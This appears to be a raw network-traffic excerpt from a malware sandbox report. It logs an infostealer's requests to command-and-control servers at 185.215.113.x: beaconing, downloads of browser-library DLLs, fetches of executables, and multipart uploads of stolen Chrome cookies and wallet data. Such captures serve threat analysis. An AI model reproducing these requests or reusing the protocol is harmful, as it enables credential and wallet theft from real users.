Source: global traffic	HTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBAAFIDGDAAAAAAAAKEBHost: 185.215.113.17Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 41 41 46 49 44 47 44 41 41 41 41 41 41 41 41 4b 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 37 36 30 66 35 64 62 64 37 61 39 32 38 65 34 63 30 38 64 39 30 64 61 64 39 66 36 32 32 38 35 66 32 64 63 33 33 39 37 36 66 30 31 66 37 38 30 61 63 36 37 36 31 61 63 38 61 33 35 39 38 34 39 64 37 64 34 32 34 64 61 0d 0a 2d 2d 2d 2d 2d 2d 44 42 41 41 46 49 44 47 44 41 41 41 41 41 41 41 41 4b 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 44 42 41 41 46 49 44 47 44 41 41 41 41 41 41 41 41 4b 45 42 2d 2d 0d 0a Data Ascii: ------DBAAFIDGDAAAAAAAAKEBContent-Disposition: form-data; name="token"e760f5dbd7a928e4c08d90dad9f62285f2dc33976f01f780ac6761ac8a359849d7d424da------DBAAFIDGDAAAAAAAAKEBContent-Disposition: form-data; name="message"fplugins------DBAAFIDGDAAAAAAAAKEB--
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFHDHIJDGCBAKFIEGHCBHost: 185.215.113.17Content-Length: 6715Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C
Source: global traffic	HTTP traffic detected: GET /f1ddeb6592c03206/sqlite3.dll HTTP/1.1Host: 185.215.113.17Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C
Source: global traffic	HTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBAAFIDGDAAAAAAAAKEBHost: 185.215.113.17Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 41 41 46 49 44 47 44 41 41 41 41 41 41 41 41 4b 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 37 36 30 66 35 64 62 64 37 61 39 32 38 65 34 63 30 38 64 39 30 64 61 64 39 66 36 32 32 38 35 66 32 64 63 33 33 39 37 36 66 30 31 66 37 38 30 61 63 36 37 36 31 61 63 38 61 33 35 39 38 34 39 64 37 64 34 32 34 64 61 0d 0a 2d 2d 2d 2d 2d 2d 44 42 41 41 46 49 44 47 44 41 41 41 41 41 41 41 41 4b 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 44 42 41 41 46 49 44 47 44 41 41 41 41 41 41 41 41 4b 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 56 46 4a 56 52 51 6b 76 43 55 5a 42 54 46 4e 46 43 54 45 32 4f 54 6b 77 4e 7a 67 33 4d 7a 67 4a 4d 56 42 66 53 6b 46 53 43 54 49 77 4d 6a 4d 74 4d 54 41 74 4d 44 55 74 4d 44 67 4b 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 6b 33 4f 54 4d 34 43 55 35 4a 52 41 6b 31 4d 54 45 39 62 33 4a 6a 55 30 6c 75 62 31 70 43 59 6a 5a 54 63 6e 63 77 55 47 52 51 54 55 35 6c 54 45 64 4c 63 32 56 6e 5a 6b 78 70 4c 58 52 52 62 6e 5a 70 61 47 38 31 61 45 74 4b 57 45 74 45 54 6d 63 77 61 31 68 4a 55 47 35 6d 56 47 4e 31 64 31 59 31 63 6a 64 53 63 57 70 55 4f 44 6b 7a 63 46 64 48 53 6b 59 33 61 32 78 4c 63 57 78 6b 51 6d 39 71 4e 48 4a 45 53 6e 5a 34 5a 6b 5a 73 5a 30 52 50 51 32 4e 58 4f 57 46 4c 52 47 35 56 4f 58 70 4a 62 46 56 6f 4d 6b 78 51 4d 48 5a 50 4f 47 73 7a 64 56 51 77 5a 30 68 4b 52 44 46 4b 64 6c 5a 42 59 32 78 72 53 6d 35 4c 64 31 70 48 4e 6d 68 45 51 57 77 32 4d 6b 68 79 54 58 68 4f 63 6c 56 6c 63 56 4e 53 4c 56 64 47 4d 55 6f 74 62 44 6c 5a 57 57 64 46 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 42 41 41 46 49 44 47 44 41 41 41 41 41 41 41 41 4b 45 42 2d 2d 0d 0a Data Ascii: ------DBAAFIDGDAAAAAAAAKEBContent-Disposition: form-data; name="token"e760f5dbd7a928e4c08d90dad9f62285f2dc33976f01f780ac6761ac8a359849d7d424da------DBAAFIDGDAAAAAAAAKEBContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------DBAAFIDGDAAAAAAAAKEBContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwNzg3MzgJMVBfSkFSCTIwMjMtMTAtMDUtMDgKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjk3OTM4CU5JRAk1MTE9b3JjU0lub1pCYjZTcncwUGRQTU5lTEdLc2VnZ
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CBFIJEGIDBGIECAKKEGDHost: 185.215.113.17Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 42 46 49 4a 45 47 49 44 42 47 49 45 43 41 4b 4b 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 37 36 30 66 35 64 62 64 37 61 39 32 38 65 34 63 30 38 64 39 30 64 61 64 39 66 36 32 32 38 35 66 32 64 63 33 33 39 37 36 66 30 31 66 37 38 30 61 63 36 37 36 31 61 63 38 61 33 35 39 38 34 39 64 37 64 34 32 34 64 61 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 49 4a 45 47 49 44 42 47 49 45 43 41 4b 4b 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 49 4a 45 47 49 44 42 47 49 45 43 41 4b 4b 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 49 4a 45 47 49 44 42 47 49 45 43 41 4b 4b 45 47 44 2d 2d 0d 0a Data Ascii: ------CBFIJEGIDBGIECAKKEGDContent-Disposition: form-data; name="token"e760f5dbd7a928e4c08d90dad9f62285f2dc33976f01f780ac6761ac8a359849d7d424da------CBFIJEGIDBGIECAKKEGDContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------CBFIJEGIDBGIECAKKEGDContent-Disposition: form-data; name="file"------CBFIJEGIDBGIECAKKEGD--
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBGIEGCFHCFHIDHIJECAHost: 185.215.113.17Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 42 47 49 45 47 43 46 48 43 46 48 49 44 48 49 4a 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 37 36 30 66 35 64 62 64 37 61 39 32 38 65 34 63 30 38 64 39 30 64 61 64 39 66 36 32 32 38 35 66 32 64 63 33 33 39 37 36 66 30 31 66 37 38 30 61 63 36 37 36 31 61 63 38 61 33 35 39 38 34 39 64 37 64 34 32 34 64 61 0d 0a 2d 2d 2d 2d 2d 2d 45 42 47 49 45 47 43 46 48 43 46 48 49 44 48 49 4a 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 42 47 49 45 47 43 46 48 43 46 48 49 44 48 49 4a 45 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 45 42 47 49 45 47 43 46 48 43 46 48 49 44 48 49 4a 45 43 41 2d 2d 0d 0a Data Ascii: ------EBGIEGCFHCFHIDHIJECAContent-Disposition: form-data; name="token"e760f5dbd7a928e4c08d90dad9f62285f2dc33976f01f780ac6761ac8a359849d7d424da------EBGIEGCFHCFHIDHIJECAContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------EBGIEGCFHCFHIDHIJECAContent-Disposition: form-data; name="file"------EBGIEGCFHCFHIDHIJECA--
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 31 32 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000129001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /f1ddeb6592c03206/freebl3.dll HTTP/1.1Host: 185.215.113.17Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C
Source: global traffic	HTTP traffic detected: GET /3846244/1.exe?hash=AgADek HTTP/1.1Host: ddl.safone.dev
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET /f1ddeb6592c03206/mozglue.dll HTTP/1.1Host: 185.215.113.17Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET /f1ddeb6592c03206/msvcp140.dll HTTP/1.1Host: 185.215.113.17Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /f1ddeb6592c03206/nss3.dll HTTP/1.1Host: 185.215.113.17Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: GET /f1ddeb6592c03206/softokn3.dll HTTP/1.1Host: 185.215.113.17Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 31 39 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000191001&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C
Source: global traffic	HTTP traffic detected: GET /f1ddeb6592c03206/vcruntime140.dll HTTP/1.1Host: 185.215.113.17Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /3858015/Setup.exe?hash=AgADYg HTTP/1.1Host: ddl.safone.dev
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGDBKKFHIEGDHJKECAAKHost: 185.215.113.17Content-Length: 1003Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 30 34 39 43 46 46 41 31 35 41 30 44 43 45 41 46 34 41 45 39 39 33 43 43 33 31 35 31 32 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5049CFFA15A0DCEAF4AE993CC31512021C0784D71D9D043121CCF65D78857C
Source: global traffic	HTTP traffic detected: POST /Dem7kTu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.26Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /2fb6c2cc8dce150a.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKFIJJEGHDAEBGCAKJKFHost: 185.215.113.17Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 4b 46 49 4a 4a 45 47 48 44 41 45 42 47 43 41 4b 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 37 36 30 66 35 64 62 64 37 61 39 32 38 65 34 63 30 38 64 39 30 64 61 64 39 66 36 32 32 38 35 66 32 64 63 33 33 39 37 36 66 30 31 66 37 38 30 61 63 36 37 36 31 61 63 38 61 33 35 39 38 34 39 64 37 64 34 32 34 64 61 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 49 4a 4a 45 47 48 44 41 45 42 47 43 41 4b 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 49 4a 4a 45 47 48 44 41 45 42 47 43 41 4b 4a 4b 46 2d 2d 0d 0a Data Ascii: ------BKFIJJEGHDAEBGCAKJKFContent-Disposition: form-data; name="token"e760f5dbd7a928e4c08d90dad9f62285f2dc33976f01f780ac6761ac8a359849d7d424da------BKFIJJEGHDAEBGCAKJKFContent-Disposition: form-data; name="message"wallets------BKFIJJEGHDAEBGCAKJKF--
